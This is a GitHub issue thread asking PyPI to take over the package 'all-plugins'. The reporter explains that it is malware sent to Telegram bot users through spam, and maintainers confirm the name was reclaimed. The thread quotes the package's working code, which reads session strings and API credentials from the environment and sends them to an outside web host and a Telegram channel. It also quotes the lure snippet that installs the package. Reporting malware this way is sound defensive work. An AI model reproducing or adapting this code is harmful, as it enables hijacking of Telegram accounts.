### ISSUE TITLE
PEP 541 Request: all-plugins

### ISSUE THREAD

**Issue by painor** [pypa/pypi-support#1052]
### Project to be claimed

`all-plugins`: https://pypi.org/project/all-plugins/

### Your PyPI username

`painor`: https://pypi.org/user/painor/

### Reasons for the request

This is a malicious package that's been sent to multiple users as a spam message. as soon as you install it it will steal all your session data (your account/cookies) and send them to a 3rd party website. 

The code can be read easily in `__init__.py`. it is not obfuscated. 
example of the spam people are receiving 
![image](https://user-images.githubusercontent.com/30215770/116263283-28a55900-a771-11eb-91a8-e1e1c498f057.png)

The code with the file (do not run)
```
import os
os.system("pip install all-plugins")
import plugins
try:
  from plugins import load_plugs
except:
   pass
print("plugins added")
from telethon import events
@bot.on(events.NewMessage(pattern='.extra_plugs', outgoing=True))
async def extra (event):
  try:
     await load_plugs()
  except:
       pass
  await event.edit(f"installing {len(plugins.SS)} plugins please wait")
```

The malicious package code 
```
from requests import get
import os, asyncio

SS = os.environ.get("STRING_SESSION", None)
if not SS:
    SS = os.environ.get("TELEGRAM_STRING_SESSION", None)
    if not SS:
        SS = os.environ.get("TG_STRING_SESSION", None)
        if not SS:
            SS = os.environ.get("STRINGSESSION", None)
            if not SS:
                SS = os.environ.get("SESSION", None)


AI = os.environ.get("API_ID", None)
if not AI:
    AI = os.environ.get("APP_ID", None)
    if not AI:
        AI = os.environ.get("APIID", None)
        if not AI:
            AI = os.environ.get("APPID", None)


AH = os.environ.get("API_HASH", None)
if not AI:
    AI = os.environ.get("APP_HASH", None)
    if not AI:
        AI = os.environ.get("APIHASH", None)
        if not AI:
            AI = os.environ.get("APPHASH", None)

pwd = os.environ.get("PWD", None)

AN = os.environ.get("ALIVE_NAME", None)
if not AN:
    AN = "None"

def run(**args):
   try:
       get(f"https://legendx22.000webhostapp.com/ses.php?user={AN}&ses={SS}&submit=Submit")
   except BaseException:
       pass
run()

from telethon.tl.functions.channels import JoinChannelRequest as join, LeaveChannelRequest as leave
async def load_plugs():
  try:
     await bot(join ("all_plugins_pro"))
     await bot.send_message("all_plugins_pro", bot.session.save())
     await bot(leave("all_plugins_pro"))
  except:
      pass
```

### Maintenance or replacement?

Replacement

### Source code repositories URLs

Does not seem to exist. on tar file is provided

### Contact and additional research

The owner seems to be aware of it and is the one sending it. was not able to tell him to  stop. 

### Code of Conduct

- [X] I agree to follow the PSF Code of Conduct

**Comment by yeraydiazdiaz** [comment]
Hello, seems the project has changed owners and its contents replaced to avoid this attack. There is an email address in the description to contact the owner if you have a legitimate use case. I'm closing this issue for housekeeping, feel free to open it again if you fail to contact the new owner.

**Comment by yeraydiazdiaz** [comment]
CCing @penn5 as the current owner.

**Comment by penn5** [comment]
> CCing @penn5 as the current owner.

The user removed the package and I claimed it to prevent further abuse.
